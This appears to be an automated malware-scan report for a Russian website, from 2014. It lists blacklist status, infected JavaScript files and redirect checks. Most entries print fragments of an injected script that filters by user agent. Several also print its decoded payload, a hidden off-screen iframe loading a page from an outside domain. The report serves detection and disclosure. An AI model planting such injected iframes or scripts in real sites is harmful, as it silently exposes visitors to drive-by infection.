Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=nordstar24.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://nordstar24.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://nordstar24.ru/ | 200 OK Content-Length: 37600 Content-Type: text/html | clean |
http://nordstar24.ru/media/system/js/caption.js | 200 OK Content-Length: 3809 Content-Type: application/javascript | clean |
http://nordstar24.ru/modules/mod_s5_live_search/js/s5_ls_fade.js | 200 OK Content-Length: 6027 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome/','Chrome' result = result.replace(/[\n\r]/g,""); result = eval('('+result+')'); } if(ths.callback) ths.callback(result); } else { if(ths.error) ths.error(http.status); } } } this.http.send(null); }, init : function() {this.http = this.getHTTPObject();} } ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Decoded script: <iframe src=http://dazzlesphere.ru/j6k5e7l656k4j.6k7lkymtjrnhj?default style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe> Antivirus reports:
| ||
http://nordstar24.ru/modules/mod_s5_box/js/jquery.min.js | 200 OK Content-Length: 59140 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome/','Chrome' Antivirus reports:
| ||
http://nordstar24.ru/modules/mod_s5_box/js/jquery.no.conflict.js | 200 OK Content-Length: 1866 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser', ...[1430 bytes skipped]... Decoded script: <iframe src=http://dazzlesphere.ru/j6k5e7l656k4j.6k7lkymtjrnhj?default style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe> | ||
http://nordstar24.ru/modules/mod_s5_box/js/jquery.colorbox.js | 200 OK Content-Length: 20707 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome/','Chrome' publicMethod.next = next; publicMethod.prev = prev; publicMethod.close = close; publicMethod.load = load; publicMethod.position = position; publicMethod.dimensions = dimensions; publicMethod.element = function(){ return element; }; publicMethod.settings = defaults; $(function () { init(); }); }(jQuery)); ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://nordstar24.ru/templates/pantheon/js/multibox/overlay.js | 200 OK Content-Length: 4352 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome/','Chrome' top: myCoords.top+'px', height: myCoords.height+'px', left: myCoords.left+'px', width: myCoords.width+'px' }); } }, show: function(){ this.fade.start(0,this.options.opacity); }, hide: function(){ this.fade.start(this.options.opacity,0); } }); Overlay.implement(new Options); ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://nordstar24.ru/templates/pantheon/js/multibox/multibox.js | 200 OK Content-Length: 14036 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome/','Chrome' src: this.contentObj.url, frameborder: 0, scrolling: 'auto' }).injectInside(this.contentContainer); }else if(this.type == 'htmlelement'){ this.elementContent.clone().setStyle('display','block').injectInside(this.contentContainer); }else if(this.type == 'ajax'){ new Ajax(this.contentObj.url, { method: 'get', update: 'MultiBoxContentContainer', evalScripts: true, autoCancel: true }) Antivirus reports:
| ||
http://nordstar24.ru/templates/pantheon/js/multibox/AC_RunActiveContent.js | 200 OK Content-Length: 9875 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome/','Chrome' case "name": case "tabindex": ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i+1]; break; default: ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1]; } } ret.objAttrs["classid"] = classid; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; } ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Decoded script: <iframe src=http://dazzlesphere.ru/j6k5e7l656k4j.6k7lkymtjrnhj?default style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe> Antivirus reports:
| ||
http://nordstar24.ru/templates/pantheon/js/jquery13.js | 200 OK Content-Length: 118724 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome/','Chrome' document.body["scroll" + name], document.documentElement["scroll" + name], document.body["offset" + name], document.documentElement["offset" + name] ) : size === undefined ? (this.length ? jQuery.css( this[0], type ) : null) : this.css( type, typeof size === "string" ? size : size + "px" ); }; });})(); };;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://nordstar24.ru/templates/pantheon/js/jquery_no_conflict.js | 200 OK Content-Length: 1866 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser', ...[1430 bytes skipped]... Decoded script: <iframe src=http://dazzlesphere.ru/j6k5e7l656k4j.6k7lkymtjrnhj?default style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe> | ||
http://nordstar24.ru/modules/mod_maaslide/jquery2.js | 200 OK Content-Length: 117240 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome/','Chrome' l.fn("[pattern]",function(b){var a=new RegExp("^"+b.attr("pattern")+"$");return a.test(b.val())});c.fn.validator=function(b){if(this.data("validator"))return this;b=c.extend(true,{},l.conf,b);return this.each(function(){var a=new w(c(this),b);c(this).data("validator",a)})}})(jQuery); ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://nordstar24.ru/templates/pantheon/js/s5_menu_active_and_parent_links.js | 200 OK Content-Length: 2933 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome/','Chrome' if (s5_fm_li3[z3].innerHTML.indexOf("<UL") > 0 || s5_fm_li3[z3].innerHTML.indexOf("<ul") > 0) { if (s5_fm_li3[z3].className == "active") { s5_fm_li3[z3].className = "active s5_level_one_parent"; } else if (s5_fm_li3[z3].className != "active") { s5_fm_li3[z3].className = "s5_level_one_parent"; } } } };;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Decoded script: <iframe src=http://dazzlesphere.ru/j6k5e7l656k4j.6k7lkymtjrnhj?default style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe> Antivirus reports:
| ||
http://nordstar24.ru/modules/mod_s5_box/js/s5_box_hide_div.js | 200 OK Content-Length: 2215 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome/','Chrome' } }; })(); var s5_box_hide_div = document.getElementsByTagName("DIV"); for (var s5_box_hide_div_y=0; s5_box_hide_div_y<s5_box_hide_div.length; s5_box_hide_div_y++) { s5_box_hide_div_holder = s5_box_hide_div[s5_box_hide_div_y].className; if (s5_box_hide_div_holder.indexOf("-s5_box") > 0) { s5_box_hide_div[s5_box_hide_div_y].style.display = "none"; } };;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Decoded script: <iframe src=http://dazzlesphere.ru/j6k5e7l656k4j.6k7lkymtjrnhj?default style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe> Antivirus reports:
| ||
http://nordstar24.ru/templates/pantheon/js/s5_textmenu.js | 200 OK Content-Length: 3235 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome/','Chrome' } if (document.getElementById("s5_tm_8")) { document.getElementById("s5_tm_8").innerHTML = s5_text_menu_8; } if (document.getElementById("s5_tm_9")) { document.getElementById("s5_tm_9").innerHTML = s5_text_menu_9; } if (document.getElementById("s5_tm_10")) { document.getElementById("s5_tm_10").innerHTML = s5_text_menu_10; } ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Decoded script: <iframe src=http://dazzlesphere.ru/j6k5e7l656k4j.6k7lkymtjrnhj?default style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe> Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: nordstar24.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 19 Sep 2014 08:02:25 GMT
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=windows-1251;
X-Powered-By: PHP/5.3.27
GET / HTTP/1.1
Host: nordstar24.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 19 Sep 2014 08:02:25 GMT
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=windows-1251;
X-Powered-By: PHP/5.3.27
Second query (visit from search engine):
GET / HTTP/1.1
Host: nordstar24.ru
Referer: http://www.google.com/search?q=nordstar24.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: nordstar24.ru
Referer: http://www.google.com/search?q=nordstar24.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.